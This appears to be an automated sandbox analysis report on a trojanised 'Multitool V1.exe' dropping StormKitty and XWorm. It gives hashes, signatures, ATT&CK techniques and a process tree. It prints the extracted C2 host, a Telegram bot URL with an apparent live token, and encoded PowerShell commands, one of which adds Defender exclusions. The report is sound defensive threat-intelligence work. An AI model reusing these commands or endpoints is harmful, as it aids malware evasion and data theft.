stormkitty | b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba

General

Target

Multitool V1.exe
Size

307KB
MD5

520f8ed0d73dbc6540fc80ac0c3847e1
SHA1

81476c36b9ea1b6d18864b90310eb95ec20e5475
SHA256

b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba
SHA512

0981f5323101a214f1ee6e57f5d10b2136213ef88b4b44e1bd769114734679c2439f6338df585712137ef01684cc7b2658a3820f79da0b196c2e7a11bb06b2e4
SSDEEP

6144:aMCOuWBJL5pt0UA8yTHsRRs6kkU7ezfQE62e3goypHp/3EvCcp3yVaG:aMCOucJL5pEDkU7Me3gpQTyVaG

Score

10^/10

stormkitty xworm defense_evasion discovery rat stealer trojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:38960

metherium-38960.portmap.host:38960

Attributes

Install_directory
%AppData%
install_file
host.exe
telegram
https://api.telegram.org/bot7283946415:AAGGT2xYjdDOFdezS7k5STvPS9SoyGQdKEg

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000012117-2.dat	family_xworm
behavioral1/memory/2556-21-0x00000000003B0000-0x00000000003CA000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000016cfe-11.dat	family_stormkitty
behavioral1/memory/2804-20-0x0000000000FB0000-0x0000000000FEC000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Executes dropped EXE 2 IoCs

pid	Process
2556	client.exe
2804	svchost.exe

Loads dropped DLL 7 IoCs

pid	Process
2248	Multitool V1.exe
2248	Multitool V1.exe
2664	WerFault.exe
2664	WerFault.exe
2664	WerFault.exe
2664	WerFault.exe
2664	WerFault.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ipinfo.io
7	ip-api.com
4	ipinfo.io

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2664	2804	WerFault.exe	35

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Multitool V1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3032	powershell.exe
2204	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeDebugPrivilege	2556	client.exe
Token: SeDebugPrivilege	2804	svchost.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 3032	2248	Multitool V1.exe	30
PID 2248 wrote to memory of 3032	2248	Multitool V1.exe	30
PID 2248 wrote to memory of 3032	2248	Multitool V1.exe	30
PID 2248 wrote to memory of 3032	2248	Multitool V1.exe	30
PID 2248 wrote to memory of 2204	2248	Multitool V1.exe	32
PID 2248 wrote to memory of 2204	2248	Multitool V1.exe	32
PID 2248 wrote to memory of 2204	2248	Multitool V1.exe	32
PID 2248 wrote to memory of 2204	2248	Multitool V1.exe	32
PID 2248 wrote to memory of 2556	2248	Multitool V1.exe	34
PID 2248 wrote to memory of 2556	2248	Multitool V1.exe	34
PID 2248 wrote to memory of 2556	2248	Multitool V1.exe	34
PID 2248 wrote to memory of 2556	2248	Multitool V1.exe	34
PID 2248 wrote to memory of 2804	2248	Multitool V1.exe	35
PID 2248 wrote to memory of 2804	2248	Multitool V1.exe	35
PID 2248 wrote to memory of 2804	2248	Multitool V1.exe	35
PID 2248 wrote to memory of 2804	2248	Multitool V1.exe	35
PID 2804 wrote to memory of 2664	2804	svchost.exe	36
PID 2804 wrote to memory of 2664	2804	svchost.exe	36
PID 2804 wrote to memory of 2664	2804	svchost.exe	36
PID 2804 wrote to memory of 2664	2804	svchost.exe	36

C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe
"C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AbABlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAB5AHQAaABvAG4AIABJAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAE4AZQBlAGQAZQBlAGQAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGEAYwAjAD4A"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAcwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAbgB5ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
- C:\Users\Admin\AppData\Roaming\client.exe
  "C:\Users\Admin\AppData\Roaming\client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Users\Admin\AppData\Local\svchost.exe
  "C:\Users\Admin\AppData\Local\svchost.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 1084
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\svchost.exe

Filesize
213KB

MD5
23b83fe86a71cfba0d920fc658b3e010

SHA1
c9fd9d1dc68bcef1bfb2845d4cc35ea2a5b9d6dc

SHA256
6259f4d3310169e2b795e26a95ae21c7781abcb726322bc2eae0102546c816cf

SHA512
22a49771a71a7b4504635692d0d671223cfb4a5d5f8d892918291f1b733336b935926b67ae032f4797e3067f1d4f4aee4bf2ff2b0f2f607ea465ea6e87365ea3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
16dfc7e484a4b0d38616136d674b8656

SHA1
925e07c56e06081f31088ed23e9b096a91abc146

SHA256
57b91cd3b7a8aac07d7ce4541fd7ba72f256a6ee3d549d17aa9bd74e9fd82977

SHA512
0ab05634e0fd09b80e18f8c24ee3ed47ddf3bc0e046748c1641e697ef42ab4c839c5c888f0371e2738309b5affe0a5b665787dc4587f1651ca96b5f0dbfc5eda

Download Submit
\Users\Admin\AppData\Roaming\client.exe

Filesize
79KB

MD5
10db01a500572f3468f4302068d6db1e

SHA1
90589a587d2ea36451a11e650a7b0041807b3be8

SHA256
cae10e709d8f1dcf7deee20ddc601be133961ed8542f8505d3a016bbedfc9e84

SHA512
c8cdd0eae61bc94f5978673e2bbda0b7916a87b7ab582036c3b95978b404f78202f3e8f31b32e050fd7298a682382b61db8c9b13828d97786ed052720fd3b8f9

Download Submit
memory/2556-21-0x00000000003B0000-0x00000000003CA000-memory.dmp

Filesize
104KB

Download
memory/2804-20-0x0000000000FB0000-0x0000000000FEC000-memory.dmp

Filesize
240KB

Download

Analysis

Sharing